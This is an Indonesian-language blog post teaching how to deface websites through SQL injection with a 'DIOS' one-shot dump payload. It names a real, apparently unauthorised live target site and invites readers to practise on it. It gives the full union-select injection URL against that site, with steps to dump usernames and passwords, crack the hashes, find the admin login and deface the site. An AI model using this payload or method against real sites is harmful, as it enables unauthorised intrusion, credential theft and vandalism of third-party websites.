Tutorial Deface Metode SQL With Dios
Ok skrng gw akan kasih cara deface menggunakan metode SQL with dios,, Kan ditutorial gw sebelumnya gw pernah share deface SQL dengan termux , SQL into outfile, dll,, Caranya sih lebih gampang ini karna kita cmn perlu ngeluarin angka togelnya dan auto nge-dump dengan dios,, Untuk dorknya bisa kalian cari digoogle ,, Disini gw udh ada live target jadi gk ush dork lagi :v,, Bisa juga kalian pke live target gw buat bljr,, Tapi jangan di up shell or diindex yaa anjg :v,,
- Live Target : http://cmc.org.kh/our_program.php?id=11
- Dios : make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Pertama kita buka target kita kemudian tambahkan string di belakang websitenya (') ,, Setelah diberi string pasti error webnya
Kemudian kita tambahkan order+by+angka--+- ,, Cari sampai gk error,,
Lah di angka 10 masih error coba kita turunkan 1 angka lagi,,
Uda kembali lagi webnya itu artinya columb web nya cuman ada 9,, kemudian setelah itu kita tambahkan +union+select+angkanya--+-,,
Ini adalah langkah akhirnya ,, Setelah union+select pasti akan muncul angka togelnya ,, angka togelnya inilah yg kita dump,, target kita kan 2 dan 6 ,, skrng tinggal masukan DIOS nya aja dibagian 2 atau 6 nya ,,
Jdi Seperti ini kalaw yg didump angka 2 nya : http://cmc.org.kh/our_program.php?id=-11+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9--+-
Tinggal dump u&p nya,, kemudian hash passnya,, cari adlog dan duarrrr happy deface
Thanks for reading
#share and comment
0 komentar:
Posting Komentar